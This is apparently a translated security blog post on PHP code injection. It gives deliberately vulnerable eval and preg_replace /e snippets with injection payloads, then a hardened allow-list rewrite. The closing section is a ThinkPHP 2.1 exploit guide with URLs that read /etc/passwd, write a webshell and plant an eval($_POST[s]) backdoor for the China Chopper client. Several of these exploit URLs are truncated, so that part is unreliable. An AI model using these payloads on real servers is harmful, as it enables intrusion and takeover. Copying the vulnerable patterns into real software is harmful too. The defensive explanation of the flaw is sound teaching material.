Cause of the vulnerability: parameters submitted by the client are passed, without any filtering, into a function that can execute code, resulting in a code execution vulnerability.

Common code injection functions:

These include eval, preg_replace with the /e modifier, assert, call_user_func, call_user_func_array, and create_function.

See http://www.cnblogs.com/xiaozi/p/7834367.html

Vulnerability hazards: code execution, writing a webshell, and control of the server.

Code Example 1:

<?php
// ?cmd=phpinfo();
@eval($_GET['cmd']);
?>

Code Example 2:

<?php
// ?cmd=${phpinfo()}
$str = $_GET['cmd'];
eval('$str="'.$str.'";');
?>

Inside double quotes, PHP code can be executed in this way.

Code Example 3:

<?php
// ?cmd=%27);phpinfo();//
$str = $_GET['cmd'];
eval("strtolower('$str');");
?>

Code Example 4: the preg_replace function

<?php
preg_replace("/<php>(.*?)<\/php>/e", '\1', "<php>phpinfo()</php>");
// equivalent to preg_replace("/<php>(.*?)<\/php>/e", '${1}', "<php>phpinfo()</php>");
?>

 

Reference:

Beware of using the dangerous /e modifier with preg_replace

www.jb51.net/article/387…
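
A hardened counterpart to Examples 1 to 4, as an added example that is not code from the original article: the request value only selects an entry from a fixed allow-list and is never passed to eval, the /e modifier, or call_user_func directly. The names run_action and render_tags and the table contents are hypothetical.

```php
<?php
// Added illustration: run_action(), render_tags() and both tables are hypothetical.

// Replaces eval($_GET['cmd']) and call_user_func($_GET['cmd']): the request
// value is only a key into a fixed table of callables.
const ACTIONS = [
    'lower'  => 'strtolower',
    'upper'  => 'strtoupper',
    'length' => 'strlen',
];

function run_action(string $action, string $arg)
{
    if (!array_key_exists($action, ACTIONS)) {
        throw new InvalidArgumentException('action not allowed');
    }
    // The argument is passed as a value and never spliced into code text.
    return call_user_func(ACTIONS[$action], $arg);
}

// Replaces preg_replace with the /e modifier: preg_replace_callback hands the
// capture to a function as a plain string, so nothing in it is evaluated.
function render_tags(string $input): string
{
    $vars = ['site' => 'example', 'lang' => 'en'];   // constructed sample values
    return preg_replace_callback(
        '/<php>(.*?)<\/php>/',
        function (array $m) use ($vars): string {
            $key = trim($m[1]);
            // Unknown names are emitted as escaped text, not executed.
            return $vars[$key] ?? htmlspecialchars($m[0], ENT_QUOTES, 'UTF-8');
        },
        $input
    );
}

// Constructed inputs, reusing the payloads from the examples above.
var_dump(run_action('lower', "');PHPINFO();//"));
echo render_tags('<php>site</php> / <php>phpinfo()</php>'), "\n";

try {
    run_action('phpinfo', '');
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}
```

The /e modifier was deprecated in PHP 5.5 and removed in PHP 7.0, so preg_replace_callback is also the only form that runs on current PHP.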

 

 

ThinkPHP framework arbitrary code execution exploit

Generally, look for known vulnerabilities in the corresponding CMS version, such as ThinkPHP 2.1.

* One-liner

www.xxx.com/News/detail… }}

* Get the current path

www.xxx.com/News/detail,…). }}

* Read a file

www.xxx.com/News/detail… }}

POST data: f=/etc/passwd

* Write a shell

http://www.xxx.com/News/detail/id/{${exit(var_dump(file_put_contents($_POST['f'],$_POST[d])))}}

PHP @eval($_POST['aa'])?>

 

Execute the one-liner directly, then connect to it with China Chopper (the "kitchen knife" client):

http://site/index.php/module/action/param1/{${eval($_POST[s])}}

Password: s

 

About me: a network security enthusiast, dedicated to sharing original, high-quality practical content. You are welcome to follow my personal WeChat public account, Bypass–, to browse more articles.
